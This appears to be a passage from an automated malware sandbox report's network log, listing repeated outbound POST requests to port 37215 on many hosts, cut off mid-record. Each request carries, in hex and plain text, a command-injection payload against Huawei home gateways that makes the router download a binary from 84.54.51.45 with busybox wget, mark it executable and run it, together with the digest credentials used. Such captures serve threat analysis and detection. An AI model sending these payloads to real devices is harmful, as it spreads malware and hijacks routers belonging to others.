2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2030192.168.2.154736841.229.205.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606462002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2031192.168.2.153817841.249.227.937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606499910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2032192.168.2.153397441.102.14.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606578112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2033192.168.2.155398441.219.63.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663572073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2034192.168.2.153858241.18.202.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663604975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2035192.168.2.155754241.93.4.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663677931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2036192.168.2.153825241.128.169.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663677931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2037192.168.2.153337841.22.233.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663714886 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2038192.168.2.154873441.226.188.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663714886 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2039192.168.2.155599641.57.81.11237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663723946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2040192.168.2.154016041.208.212.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.663748980 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
